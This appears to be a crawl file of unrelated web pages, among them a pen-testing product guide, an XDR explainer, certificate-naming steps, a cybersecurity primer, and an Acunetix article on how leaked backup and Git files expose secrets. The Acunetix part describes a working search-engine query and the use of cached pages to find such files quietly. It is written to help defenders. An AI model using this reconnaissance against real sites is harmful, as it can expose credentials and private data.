Such attacks are multi-layered, with attackers remaining in the environment long after the initial exploitation. Once they’ve gained an initial foothold, they’ll work on strengthening it to get closer to their ultimate goal. For example, while they may use a successful phishing attack as their entry point, the end goal of the attack is not to remain on the initial victim’s device. Instead, they’ll begin to determine if additional users have access to the machine, what networks it can talk to, and where the local DNS servers or even domain controllers are. From there, they’ll pivot, using another attack to gain access to other systems.
Since such attacks take more time and skill in order to gain additional access to a hard-to-reach target, they need to remain undetected and linger in the system. Consequently, attackers focus on “low and slow” attacks, which involve stealthily moving from one compromised host to the next, without generating irregular or unpredictable network traffic in order to hunt for their specific data or system objectives.
Unfortunately, many security teams are focused solely on initial exploitation, as their resources don’t enable them to explore potential next steps of an attack.
Acme’s security team could use a penetration testing solution like Core Impact to run advanced penetration tests. In addition to information gathering and entry point attacks, such tools can also run tests to escalate privileges after a successful breach, allowing them to advance further into an IT environment.
Additionally, just as cyber-attackers use multiple tools, so must penetration testers. A security team could benefit from an adversary simulation solution to further play out an advanced persistent threat (APT) scenario. Solutions like Cobalt Strike can emulate a threat actor focused on stealth and post-exploitation so that cybersecurity professionals can determine whether an infrastructure’s defenses are strong enough to detect or prevent an advanced adversary from moving closer to critical assets. In fact, Core Impact and Cobalt Strike even have interoperability features, like session passing, which allows an attack simulation to be played out from initial breach to an embedded actor.
Use Case: IoT and SCADA Testing
Acme’s IT infrastructure does not just consist of servers and workstations. As a large manufacturing company, they have a SCADA system, as well as IoT devices, like the office’s smart thermostat. Additionally, Acme permits remote work, so IoT devices in the homes of employees may also be connected to the network.
Many IoT devices have become critical to organizational productivity. Unfortunately, these added benefits are accompanied by security risks. IoT devices not only increase the attack surface, they further increase risk because they often lack traditional preventative layers like antivirus.
The danger of IoT devices is two-fold. First, threat actors may have a substantially easier time breaching the network using IoT devices as their entry points. While the IoT device may not provide significant access to sensitive information, it can be used as the initial link in an attack chain that will eventually lead them deeper into the network. For example, one large data breach began when a threat actor attained credentials to an HVAC system in a company’s building.
Second, certain IoT devices and SCADA systems are essential to the primary function of an organization, so taking control of these devices or simply disabling them can completely cripple the business. This can even affect the functionality of cities or countries. For example, nuclear centrifuges were targeted by the Stuxnet worm.
Uncovering any potential vulnerabilities in these devices through pen testing is a key way to ensure they are as secure as possible. Pen testers can use exploits that take advantage of flaws or weaknesses in an IoT device, demonstrating how a threat actor could gain access. Even efforts to make IoT more secure should be tested. Some organizations have attempted to connect IoT devices using a VPN as an added safeguard. However, threat actors can also target weaknesses in VPNs, such as those that have gone unpatched, so these should also be regularly assessed.
Core Impact has a robust, stable library of expert tested commercial-grade exploits, which is regularly updated. A partnership with ExCraft Labs, an expert cybersecurity research group, provides the option to add additional IoT exploit packs, allowing pen testers to comprehensively assess every piece of an IT infrastructure.
Ultimately, these use cases show the dynamic ways pen testing tools can give organizations a security advantage, providing valuable insights that will help mitigate risk and protect essential assets. These use cases also provide a glimpse of the benefits of Core Impact, a robust, automated tool that provides both visibility into the security stance of your organization and a clear pathway towards remediation. With Core Impact, security teams can maximize their resources with a centralized solution that allows you to gather information, exploit systems using certified exploits, and generate reports, all in one place.
Ready to Start Pen Testing?
Core Impact is simple enough for your first test, powerful enough for the rest. See if Core Impact is the right fit for your organization with a free trial. | <urn:uuid:a8f50116-649b-4fe8-96ac-a7ea2415dd03> | CC-MAIN-2022-40 | https://www.coresecurity.com/resources/guides/how-assess-your-security-pen-testing-use-case-guide | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00541.warc.gz | en | 0.945321 | 4,171 | 2.578125 | 3 |
If you are new to continuity, risk, and/or resilience, you’ve come to the right place. These topics can seem overwhelming at first, but if you break them down into smaller components, they are much easier to absorb. Let’s start from the beginning.
What are business continuity, risk management, and operational resilience?
Business Continuity is the ongoing effort to understand, measure, and mitigate the risk/impact business disruptions have on an organization. The description and measurement of impact are often achieved through assessments (such as a business impact analysis).
Risk Management can be broken down into three areas:
- Operational Risk Management: The methods and practices used by organizations to manage the risk of potential loss related to internal processes, people, and systems, or from external events.
- Enterprise Risk Management: The methods and practices used by organizations to manage emerging or existing risks and capture potential opportunities related to the achievement of their strategic or enterprise-level objectives.
- Third-Party Risk Management: The process of identifying and managing risks associated with outsourcing to third-party vendors or service providers. This could include access to your organization’s data, operations, finances, customer information, or other sensitive data.
Operational Resilience is the ability of an organization to sustain and continue delivering critical products or services to its customers or clients in the face of operational disruption. This is achieved through anticipating, preventing, adapting/responding to, recovering from, and continually learning from these disruptions.
What does this look like for many organizations?
It’s different for every organization, but the ultimate goal is always to keep operations going and protect the business from harm, which can be anything from cyber threats and financial losses to reputational risks. Generally, an organization’s continuity, risk, and resilience efforts and initiatives – or program – can be categorized as one of the following:
- None: no defined methodology or solution
- Intermediate: some methodology and structure
- Mature: defined methodology but without departmental integration, possibly using minimal technology
- Advanced: defined methodology and integrated approach, leveraging technology
A big key to success is avoiding unintegrated approaches.
Many times, business continuity, risk management, and operational resilience initiatives operate in different capacities within an organization. They can also be described in other ways or even span multiple departments, subsets, and teams, such as crisis and/or incident management, enterprise or organization resilience, IT risk assessment, etc.
Even if the disciplines are managed by the same operating group, the activities are often performed as separate work streams. An unintegrated approach to these practices traditionally negatively impacts an organization’s resiliency and decreases program efficiency and effectiveness.
Integrating these business processes increases an organization’s resiliency and ability to respond to business disruptions while increasing program efficiency and effectiveness. This collaboration also helps promote a culture of resiliency throughout the organization, which really just means that as a whole, the organization understands the importance of resilience, and it touches every employee in some way.
Even with an integrated program, there are so many risks out there.
Some of these dangers and challenges include tornadoes, pandemics, supply chain failure, ransomware, theft, equipment breakdown, etc. The list can go on forever, so how do you manage all of this? All risks, as we know in the world today, can be categorized into four different types of impacts, which is also known as the all-hazards approach. These are:
Data provides a large benefit when managing and mitigating all of these risk categories.
Just as it’s important to integrate programs, it’s also important to integrate information. Basically, you need to understand how your organization works in order to protect it from breaking (from the risk impact types above).
Resilience must always be an ongoing initiative, which is why data is so key for long-term resilience, and ultimately, protecting your organization. You can use data and information to pivot as needed, making this approach much more effective than writing a book full of plans that becomes outdated almost immediately. Written plans don’t provide the agility needed in an ever-changing world − real-time data and technology do.
Start with the basics and go!
In short, start with educating and understanding, then build from there! Sooner rather than later is always better because like we’ve learned recently with the pandemic, you never really know what is going to happen.
New to all of this stuff and unsure where to start? Get more back to the basics of continuity, risk, and resilience information!
For more basics of continuity, risk, and resilience information, check out our podcast Building a More Resilient World that further discusses these topics, from getting started and understanding your organization to protecting your people.
Want to see technology in action? We are here to help! Discover what’s possible with Fusion and request a demo. | <urn:uuid:b5f291c3-63a8-4996-bc1d-f527a7ea739b> | CC-MAIN-2022-40 | https://www.fusionrm.com/blogs/back-to-the-basics-of-continuity-risk-and-resilience/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00541.warc.gz | en | 0.947714 | 1,030 | 2.609375 | 3 |
If you’re like most business owners, you’re always looking for new and innovative ways to keep your data safe. You may have heard of XDR – Extended Detection & Response Security – and wondered what it is and whether or not it’s the right solution for you. This blog post will discuss what XDR is, how it works, and why it’s such an important security measure for businesses today. We’ll also discuss EDR and MDR so that you can make an informed decision between the three. So read on to learn all about XDR.
What Is XDR?
XDR is a security term that stands for Extended Detection & Response. It’s an approach to cybersecurity that allows organizations to detect and respond to threats across the entire attack continuum, from initial compromise to full data breach. XDR builds upon the concepts of EDR (Endpoint Detection and Response) by adding detection and response capabilities for additional data types and systems beyond just endpoint data. This makes XDR a more comprehensive solution that can provide better visibility into and protection against security threats.
How Does XDR Work?
XDR is a next-generation detection and response solution that uses machine learning and behavioral analytics to detect and respond to threats in real time. It can protect your organization from ransomware, malware, and other advanced threats. XDR’s machine learning algorithm is constantly learning and improving, so it can identify new threats as they emerge. And its behavioral analytics engine monitors all activity on your network, looking for any suspicious or aberrant behavior that could indicate a threat.
When XDR detects a threat, it automatically responds with the appropriate action, such as quarantining the file or blocking the IP address. And because XDR is cloud-based, updates and new definitions are automatically deployed across all of your devices. There are four key components of XDR: data collection, data analysis, threat detection, and response.
The goal of data collection is to gather information from a variety of security tools and data sources. The XDR platform then analyzes this collected data.
Data analysis is the process of reviewing the collected data to look for patterns and indicators of compromise. This step is crucial for identifying threats that may have otherwise gone undetected.
Threat detection involves identifying actual threats from the data that has been collected and analyzed. This is typically done using a combination of machine learning and human expertise.
Response is the final stage, and it entails taking action to mitigate or neutralize the threat. This may involve anything from blocking malicious traffic to isolating infected systems.
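To make those four stages slightly more tangible, here is a deliberately tiny Python sketch of the pipeline. It is not modeled on any particular XDR product; the event format, the detection rule, and the response action are all assumptions chosen purely for illustration.

```python
# Toy events "collected" from different sources (endpoint, network, identity).
events = [
    {"source": "endpoint", "host": "ws-114", "action": "failed_login"},
    {"source": "endpoint", "host": "ws-114", "action": "failed_login"},
    {"source": "identity", "host": "ws-114", "action": "failed_login"},
    {"source": "network",  "host": "ws-114", "action": "outbound_beacon"},
    {"source": "endpoint", "host": "ws-207", "action": "failed_login"},
]

def analyze(events):
    # Analysis: correlate activity per host across all sources.
    per_host = {}
    for e in events:
        per_host.setdefault(e["host"], []).append(e["action"])
    return per_host

def detect(per_host):
    # Detection: a crude rule - repeated failed logins plus beaconing is suspicious.
    return [host for host, actions in per_host.items()
            if actions.count("failed_login") >= 3 and "outbound_beacon" in actions]

def respond(hosts):
    # Response: a real platform might isolate the host or block its traffic.
    for host in hosts:
        print(f"Isolating {host} pending investigation")

respond(detect(analyze(events)))
```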
What Are the Benefits of XDR?
1. Improved Prevention Capabilities
Extended detection and response (XDR) is a security solution that provides better visibility and protection against threats. It builds upon the traditional SIEM model by adding new capabilities such as file analysis, behavioral analytics, and machine learning. These features help to improve the accuracy of detections and provide faster incident response.
2. More Granular Visibility
XDR provides more granular visibility into the activities of users and devices on the network. By collecting data from multiple sources, it is able to provide a comprehensive view of activity across the enterprise. This includes both malicious and benign activity, which helps security teams to better understand what is happening on their networks.
3. Operation-Centric Approach to Security
XDR takes an operation-centric approach to security. This means that it focuses on the actions of users and devices rather than the data they generate. By understanding the context of the user and device activity, it is able to provide better visibility into potential threats. Additionally, this approach helps to reduce false positives and improve incident response times.
4. Instantaneous Detection and Response
XDR provides instantaneous detection and response to threats. This is possible because of real-time analysis of data from multiple sources. Additionally, it uses machine learning to continually improve its threat detection capabilities. As a result, security teams can quickly and effectively respond to incidents.
5. Operational Proficiency
XDR takes a more proactive and preventive approach to security. By using machine learning and behavioral analytics, it is able to detect threats earlier in the attack lifecycle. Additionally, it provides a closed feedback loop that helps to continuously improve the efficacy of security operations. It’s also more efficient than traditional security solutions, because it automates many of the manual tasks that are required for detection and response. Finally, XDR provides a centralized platform for managing security operations, which helps to reduce the overhead associated with managing multiple security products.
XDR vs. EDR & MDR: What’s the Difference?
There is a lot of confusion when it comes to XDR vs. EDR & MDR in data security. To understand the difference, you first need to understand what each one stands for.
XDR stands for Extended Detection and Response. This type of data security monitoring detects, analyzes, and responds to threats that have already infiltrated your system. It’s designed to provide a more holistic view of your system so you can see not only where the threat originated but also how it’s spread throughout your network. EDR, on the other hand, is Endpoint Detection and Response.
This type of data security monitors individual endpoint devices for signs of malicious activity. If a threat is detected, EDR can help you track down the source and contain the damage. MDR, finally, means Managed Detection and Response. This is a type of data security service that combines the best of both XDR and EDR.
What Is the Best Option for You?
It really depends on the specific needs of your organization. If you’re looking for a more comprehensive view of your system and how threats are spreading, then XDR may be the best solution for you. If you’re primarily concerned with endpoint devices, then EDR may be a better fit. And if you want a combination of both, then MDR may be the right choice. The important thing is to assess your needs and choose the solution that will best protect your data. Whichever one you choose, make sure it’s from a reputable provider so you can be confident in its ability to keep your system safe.
Contact Cyber Sainik for All Your Data Security Needs!
At Cyber Sainik, we offer all three types of data security solutions: XDR, EDR, and MDR. We can help you assess your needs and choose the right option for your organization. Contact us today to learn more about our data security services. | <urn:uuid:08fb891d-5109-44a8-883d-d333bddcdcdf> | CC-MAIN-2022-40 | https://cybersainik.com/a-complete-guide-of-xdr-extended-detection-response-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00541.warc.gz | en | 0.924723 | 1,375 | 2.609375 | 3 |
Changing the Friendly Name of an SSL Certificate
SSL Certificates are not required to have friendly names, and the friendly name is not part of the SSL Certificate itself. However, in environments that require multiple SSL Certificates, missing or poorly chosen friendly names can make managing your certificates more difficult.
If you are using multiple SSL Certificates in your environment, good friendly names can help you easily identify each certificate at a glance. You can use friendly names to remind you when a certificate expires, to provide information about who issued the certificate, and to distinguish multiple certificates with the same domain name.
On IIS and Exchange servers, when assigning your SSL Certificates to a website or a domain, friendly names are extremely helpful because certificates are displayed by their friendly names.
How to Edit an SSL Certificate's Friendly Name with the DigiCert Utility
On the Windows server where your SSL Certificates are located, download and save the DigiCert® Certificate Utility for Windows executable (DigiCertUtil.exe).
Run the DigiCert® Certificate Utility for Windows (double-click DigiCertUtil).
In the DigiCert Certificate Utility for Windows©, click SSL (gold lock), right-click on the SSL Certificate whose friendly name you want to change, and then click Edit friendly name.
In the Friendly Name box, enter a unique friendly name for the certificate to help you distinguish this certificate from the other certificates on your server.
Example Naming Conventions:
Domain Name: yourDomain-digicert-(expiration.date)
Company Name: yourCompany-digicert-(expiration.date)
Certificate Type: wildcard-digicert-(expiration.date)
Note: If you are using a Wildcard certificate with multiple websites, you may want to begin your friendly name with a wildcard character * (e.g. *your.domain-digicert-(expiration.date)). This naming convention makes it easier to identify the wildcard certificate so that you can assign it to multiple websites.
When you are finished, click Save. | <urn:uuid:4e18435a-936f-4b8b-a8a4-cd08ca124d45> | CC-MAIN-2022-40 | https://www.digicert.com/kb/util/utility-edit-friendly-name.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00541.warc.gz | en | 0.846337 | 441 | 2.75 | 3 |
Astronauts must be some of the bravest people on (or off) the planet. Every day they perform their jobs, they face extreme risk in the most hostile environment imaginable: outer space. If you’ve ever seen the movie “Gravity,” you’ll know how harsh survival can be outside of Earth. Watch how NASA prepares trainee astronauts for space disasters using VR and robotics. It’s out of this world! | <urn:uuid:1717c276-fab2-41b9-8b50-91a135e06b24> | CC-MAIN-2022-40 | https://www.komando.com/video/komando-picks/how-astronauts-train-for-a-worst-case-spacewalk/681945/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00541.warc.gz | en | 0.888619 | 94 | 2.75 | 3 |
Did you know that in 1984, 37 percent of computer science degrees were held by women? Today, that figure is just 19 percent. Even when women do choose STEM careers, only 26 percent work in technical roles, compared to 40 percent of men. And in technology specifically, the women who enter the industry leave at a rate 45 percent higher than their male peers.
Why? Indeed.com reached out to 1,000 women and asked them to explain.
“Lack of career growth or trajectory is a major factor driving women to leave their jobs — this was the most common response (28 percent) when we asked why they left their last job,” writes Kim Williams, senior director of design at Indeed, in a summary of Indeed’s research.
“The second most-common reason for leaving was poor management, with a quarter of respondents choosing this reason. Slow salary growth came in as the third most-common reason (24 percent) respondents left their last job. By contrast, issues related to lifestyle, such as work-life balance (14 percent), culture fit (12 percent) and inadequate parental leave policies (2 percent) were less common reasons for leaving a job,” Williams says.
Many of these issues are framed in a benign way, or at least it seems that way to me. Dig a little deeper, though, and the underlying sexism becomes clearer.
As Williams writes, “Meanwhile, many women in tech believe that men have more career growth opportunities — only half (53 percent) think they have the same opportunities to enter senior leadership roles as their male counterparts. And among women who have children or other family responsibilities, almost a third (28 percent) believe they’ve been passed up for a promotion because they are a parent or have another family responsibility.”
I don’t believe for a second that any man would be passed over for a promotion because he’s a dad or because he has additional family responsibilities.
Almost half of respondents (46 percent) believe they’re paid less than men, and 53 percent don’t believe they can ask for either a promotion or a raise.
What can companies do to address these concerns? In addition to removing unconscious bias from the hiring process and bringing more women on board, survey respondents say greater salary transparency could help, as would working toward gender pay equity across the board and empowering women to ask for deserved raises and promotions.
Good news for younger generation of women
The good news is that the youngest generation of women currently in the workforce seem well-positioned to actually do something about this – they’ll leave a job that’s not giving them opportunities or where they face discrimination without a second thought.
“More than any other age group, women age 25-34 cite the inability to break into management or leadership roles (27 percent) and bias or discrimination (25 percent) to be the biggest challenges they have faced in their careers. However, this age group is also more likely than women as a whole to leave a job because the team wasn’t diverse enough (27 percent, compared to 23 percent for all women) or there wasn’t enough female leadership representation (24 percent compared to 20 percent for all women),” the Indeed study found.
I hope the next generation of women in tech will continue to fight for equality and equity for all. | <urn:uuid:0354d5fb-a7ae-4870-ad78-240ffc7f5220> | CC-MAIN-2022-40 | https://www.cio.com/article/222541/why-women-leave-tech.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00541.warc.gz | en | 0.971806 | 697 | 2.734375 | 3 |
The very real threat of information disclosure by means of inadvertent exposure of sensitive files has been a constant source of woe for corporations and individuals alike. Despite having the potential for serious repercussions including legal ones, many webmasters, administrators and developers have struggled to contain this common issue for years. This article explores various manifestations of related issues, gives readers a glance at the modi operandi of real-world attackers trying to exploit them, and provides guidance on how to protect a website against file based information leakage.
One of the most common examples of backup files exposing sensitive information may be that of the backup copy of a .php file. A server administrator planning to modify a configuration file, such as wp-config.php, may choose to create a backup copy with a similar name first – in this example, wp-config.bak. Although clearly not best practice, this exact behaviour can be observed in the wild on a regular basis.
While the original configuration file’s name with the extension .php will be passed through the server’s PHP interpreter, the same can not necessarily be said about the backup copy. Unless configured otherwise, many popular web servers would simply deliver a file with the extension .bak as is, exposing the .php file’s source code, configuration options, and – in the case of an actual WordPress configuration file – database credentials.
When temporary files cause permanent damage
While it’s certainly easy to blame the exposure of such files on human error alone, many similar cases have resulted from software taking far-reaching decisions such as the creation of temporary or backup files on behalf of their users – and often without their knowledge, let alone consent. A typical example would be that of text editors quietly creating backup copies of currently edited files in the same directory with an easily guessable file name, often simply appending the tilde character (~) to the original file name. Even though most text editors tend to delete these files once deemed unnecessary, such functionality alone must not be relied upon given what’s at stake. Ultimately, the responsibility for the timely removal of sensitive files remains with the user.
Another common source of unintended information disclosure are versioning tools such as Git. Used by both novice and seasoned developers all over the world, partial and even whole Git repositories have repeatedly found their way onto publicly accessible web servers, and, as a result, into the hands of malicious actors.
While a proper and mature deployment cycle should not allow such data to reach a production system in the first place, experience has shown over and over again that a single mistake by programmers and administrators, often finding themselves working under relentless pressure, can be sufficient for entire .git directories to slip through and expose their contents to an audience far larger than anticipated.
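One inexpensive safeguard that complements scanning is to sweep the web root for these kinds of artifacts before or after every deployment. The Python sketch below illustrates the idea; the suffix list, directory names, and web root path are assumptions that should be adapted to your own environment rather than treated as a complete rule set.

```python
import os

# File suffixes and directory names that commonly leak source code or secrets.
RISKY_SUFFIXES = (".bak", ".old", ".orig", ".save", ".swp", "~")
RISKY_DIRS = {".git", ".svn", ".hg"}

def find_risky_artifacts(webroot):
    findings = []
    for root, dirs, files in os.walk(webroot):
        for d in dirs:
            if d in RISKY_DIRS:
                findings.append(os.path.join(root, d))
        for f in files:
            if f.endswith(RISKY_SUFFIXES):
                findings.append(os.path.join(root, f))
    return findings

if __name__ == "__main__":
    # "/var/www/html" is a placeholder; point this at your own web root.
    for path in find_risky_artifacts("/var/www/html"):
        print("potentially exposed:", path)
```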
Passive reconnaissance, active exploitation
Both malicious hackers and legitimate security researchers have been known to develop, distribute and employ tools specifically crafted with the sole purpose of locating and extracting sensitive information from forgotten or unintentionally shared files. The resulting dangers are greatly exacerbated by the relative ease with which these tools can be used to aid in the discovery of file based information disclosure.
Some of the resulting attacks do not rely on actively requesting sensitive files from the targeted web server, but will instead make use of more passive forms of reconnaissance. This includes, but is not limited to, abuse of the various little-known operators supported by freely available search engines, such as Google, Bing and Yandex. An example would be the combined use of the site: and ext: operators, as shown in the following example:
This search query <https://www.google.com/search?q=site:testphp.vulnweb.com+ext:bak&hl=en&filter=0> will yield a list of files ending in ".bak", an extension commonly associated with backup files, while restricting search results to the domain of the target – in this case, testphp.vulnweb.com.
At the time of writing, the search results for this query consist of links to the copy of the site's index.php file, exposing its source code, followed by a copy of a common WordPress configuration file, exposing sensitive information such as database credentials.
To further expand on this example, readers will note the small triangle right next to the URIs of each search result. Clicking on it will open a menu offering access to a "Cached" version of the file <http://webcache.googleusercontent.com/search?q=cache:XaK4yx2VnxYJ:testphp.vulnweb.com/index.bak+&cd=1&hl=en&ct=clnk&gl=mt>, allowing for entirely passive access to its contents without leaving evidence of access in the log files of the targeted web server. This enables attackers to extract potentially sensitive information without having to connect to the server at all, leaving site administrators and breach investigators none the wiser.
Beating the bots: Why early detection matters
Search engine caching adds another layer of complexity to the remediation of such issues. Not only must these files be identified and removed from the system exposing them – often a daunting task, considering their creation may have been unintended in the first place, but they also have to be deleted from various caches, including those of search engines. In practice, exposed passwords and similarly sensitive data have to be considered as known to third parties, leading to time-intensive and costly follow-up investigations of other systems potentially affected by the leaked information.
Fortunately, Acunetix offers various checks for multiple variants of this common vulnerability class. This includes, but is certainly not limited to, the discovery of backup files, backup copies of both files and directories, temporary files, versioning and source control system data, and also more exotic causes of information disclosure such as PHP coredumps and phpMyAdmin SQL exports.
Get the latest content on web security
in your inbox each week. | <urn:uuid:94d411e4-aaa4-498a-98d3-3356d7cab364> | CC-MAIN-2022-40 | https://www.acunetix.com/blog/web-security-zone/how-to-stop-backup-leaking-sensitive-information/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00541.warc.gz | en | 0.912964 | 1,300 | 2.578125 | 3 |
Data Engineering Integration 10.2.2
Complex Data Types
- Array: an ordered collection of elements. The elements can be of a primitive or complex data type, and all elements in the array must be of the same data type.
- Map: an unordered collection of key-value pair elements. The key must be of a primitive data type; the value can be of a primitive or complex data type.
- Struct: a collection of elements of different data types. The elements can be of primitive or complex data types, and a struct has a schema that defines the structure of the data.
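For readers who think in code, the sketch below shows roughly how a record combining all three complex types might be declared as a schema. PySpark syntax is used purely as a familiar illustration; it is not Informatica Developer syntax, and the field names are invented.

```python
from pyspark.sql.types import (
    ArrayType, IntegerType, MapType, StringType, StructField, StructType
)

# A hypothetical customer record combining the three complex types.
customer_schema = StructType([
    StructField("name", StringType()),
    # Array: ordered, and every element shares the same type.
    StructField("phone_numbers", ArrayType(StringType())),
    # Map: unordered key-value pairs; keys are primitive, values may be complex.
    StructField("preferences", MapType(StringType(), StringType())),
    # Struct: named fields of different types, described by a fixed schema.
    StructField("address", StructType([
        StructField("street", StringType()),
        StructField("city", StringType()),
        StructField("postal_code", IntegerType()),
    ])),
])

print(customer_schema.simpleString())
```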
Updated July 10, 2020 | <urn:uuid:a74663bd-f205-4bc9-91c4-ec81469b2869> | CC-MAIN-2022-40 | https://docs.informatica.com/data-engineering/data-engineering-integration/10-2-2/user-guide/hierarchical-data-processing/complex-data-types.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00741.warc.gz | en | 0.718947 | 152 | 2.921875 | 3 |
[Table of Contents]
What is cybersecurity?
Why is cybersecurity important?
How does cybersecurity affect me?
Cybersecurity 101 – Topics
How to protect yourself online & offline
[Quick Glossary / Definitions]
Cybersecurity: “measures taken to protect a computer or computer system (as on the Internet) against unauthorized access or attack”
Phishing: “a scam by which an Internet user is duped (as by a deceptive e-mail message) into revealing personal or confidential information which the scammer can use illicitly”
Denial-of-service attack (DDoS): “a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet”
Social Engineering: “the psychological manipulation of people, causing them to perform actions or divulge confidential information to malicious perpetrators”
Open-source intelligence (OSINT): “data collected from publicly available sources to be used in an intelligence context, such as an investigation or analysis of a particular subject”
With the rapid growth of computer technology throughout the past few decades, many people have started to worry about the online security and safety of the internet as a whole. In particular, users generally find it difficult to keep track of their digital footprint at all times, and people often don’t realize and aren’t always aware of the potential dangers of the internet.
Cybersecurity is a field of computer science focused on protecting computers, users, and the internet from potential security dangers that could pose as a threat to user data and system integrity when taken advantage of by malicious actors online. Cybersecurity is a rapidly growing field, both in importance and the number of jobs, and continues to be a crucial field for the foreseeable future of the internet and the digital era.
Why is Cybersecurity Important?
In 2019, according to the International Telecommunications Union (ITU), roughly half of the world population of 7.75 billion people used the internet.
That’s right — an estimated figure of 4.1 billion people were actively using the internet in their daily lives, whether it be catching up on their favorite movies and TV shows, working for their jobs, engaging in conversations with strangers online, playing their favorite video games & chatting with friends, performing academic research and affairs, or anything else on the internet.
Humans have adapted to a lifestyle extremely involved in online affairs, and there’s no doubt that there are hackers and malicious actors searching for easy prey in the online sea of internet users.
Cybersecurity workers aim to protect the internet from hackers and malicious actors by constantly researching & searching for vulnerabilities in computer systems and software applications, as well as informing software developers and end users about these important security related vulnerabilities, before they get into the hands of malicious actors.
As an end user, the effects of cybersecurity vulnerabilities and attacks can be felt both directly and indirectly.
Phishing attempts and scams are very prominent online, and can easily deceive individuals who may not realize or are aware of such scams and baits. Password and account security also commonly affect end users, leading to problems like identity fraud, bank theft, and other kinds of dangers.
Cybersecurity has the potential to warn end users about these types of situations, and can preemptively stop these types of attacks before they even reach the end user. While these are just a few examples of direct effects of cybersecurity, there are lots of indirect effects as well — for instance, password breaches and company infrastructure problems aren’t necessarily the user’s fault, but can affect the user’s personal information and online presence indirectly.
Cybersecurity aims to prevent these types of problems at an infrastructural and business level, rather than at the user level.
Next, we’ll be taking a look at various cybersecurity related subtopics, and we’ll be explaining why they’re important in relation to end users and the computer systems as a whole.
INTERNET / CLOUD / NETWORK SECURITY
The internet & cloud services are by far the most commonly utilized services online. Password leaks and account takeovers are a daily occurrence, causing tremendous damage to users in forms such as identity theft, bank fraud, and even social media damage. The cloud is no different — attackers can gain access to your personal files and information if they ever gain access to your account, along with your emails and other personal details stored online. Network security breaches don’t affect end users directly, but can cause business and small companies large amounts of damage, including but not limited to database leaks, corporate secret swindling, among other business related issues that could indirectly affect end users like you.
IOT & HOUSEHOLD SECURITY
As households slowly work towards new technologies and innovations, more and more home appliances have started to rely on internal networks (hence the term “Internet of Things”, or IoT), leading to many more vulnerabilities and attack vectors that can help attackers gain access to household appliances, such as home security systems, smart locks, security cameras, smart thermostats, and even printers.
SPAM, SOCIAL ENGINEERING & PHISHING
The introduction of online messaging boards, forums, and social media platforms into the modern internet has consequently brought in large amounts of hate speech, spam, and troll messages into the internet. Looking beyond these harmless messages, more and more instances of social engineering ploys and user phishing have also circulated throughout the world wide web, allowing attackers to target the less aware and vulnerable people of society, resulting in terrible cases of identity theft, money fraud, and general havoc on their profiles online.
In this article, we discussed the basics of cybersecurity, explored many various cybersecurity related subtopics, and looked at how cybersecurity affects us, and what we can do to protect ourselves from different types of cybersecurity threats. I hope you’ve learned something new about cybersecurity after reading this article, and remember to stay safe online!
Infographic provided by intelligence.businessinsider.com | <urn:uuid:8e3a02c0-c2cc-4f3a-a397-59bbff81d284> | CC-MAIN-2022-40 | https://hailbytes.com/cybersecurity-101-what-you-need-to-know-in-2022/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00741.warc.gz | en | 0.932447 | 1,271 | 3.4375 | 3 |
The National Oceanic and Atmospheric Administration (NOAA) is preparing to launch a geostationary satellite that can scan the earth from North Pole to South Pole in five minutes.
The Geostationary Operational Environmental Satellite-R (GOES-R) will provide weather reports to meteorologists, enabling them to observe weather patterns in the Western Hemisphere develop in near-real time. GOES-R is the first in a series of four satellites that will provide weather forecasts; it will launch at 5:40 p.m. on Nov. 4.
“GOES-R is a quantum leap above and beyond its NOAA predecessors,” said Stephen Volz, assistant administrator for NOAA’s Satellite and Information Service, at a press conference on Oct. 4. “U.S. forecasting supports the world.”
The four satellites will sustain coverage through 2036, according to Greg Mandt, NOAA’s GOES-R program manager. Mandt said that these satellites are the most sophisticated ones NOAA has ever launched and contain technological abilities previous systems lacked. For example, GOES-R is equipped with an Advanced Baseline Imager (ABI), which can take pictures revealing area imagery and radiometric information about Earth’s oceans, weather, and environment. Mandt said the ABI functions five times faster than previous satellites at a resolution four times clearer.
GOES-R is also furnished with a Geostationary Lightning Mapper (GLM), which will measure lightning activity within clouds, between clouds, and on the ground throughout the Americas. In addition to rain and winds, GOES-R will be able to measure other natural occurrences, such as volcanic ash. Mandt used the example of a volcano that erupted a few days ago in Mexico as one of the phenomena on which GOES-R will be able to collect data.
The satellite will be able to update scientists with information every five minutes. Scientists can also use the satellite to conduct detailed studies on specific events.
“We’re really excited to receive data,” said Louis Uccellini, Director of the National Weather Service (NWS). “We’re ready for this data as it flows.” | <urn:uuid:c3e464de-afed-483d-9156-fe7737290ae6> | CC-MAIN-2022-40 | https://origin.meritalk.com/articles/noaa-expects-big-data-from-most-advanced-satellite-to-date/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00741.warc.gz | en | 0.915298 | 463 | 2.671875 | 3 |
COVID-19 suppresses the immune system by causing a systemic inflammatory response, also known as cytokine release syndrome, leaving COVID-19 patients with high levels of proinflammatory cytokines and chemokines.
Nutrition’s role in the respiratory and immune systems has been investigated in much research, and its significance cannot be overstated, as the nutritional status of patients has been shown to be directly connected with the severity of the disease. Key dietary components such as vitamins C and D, omega-3 fatty acids, and zinc have shown potential anti-inflammatory effects, as has the well-known Mediterranean diet.
The study found that the use of anti-inflammatory dietary approaches does, to a certain degree, prevent SARS-CoV-2 infections and even lessen COVID-19 effects.
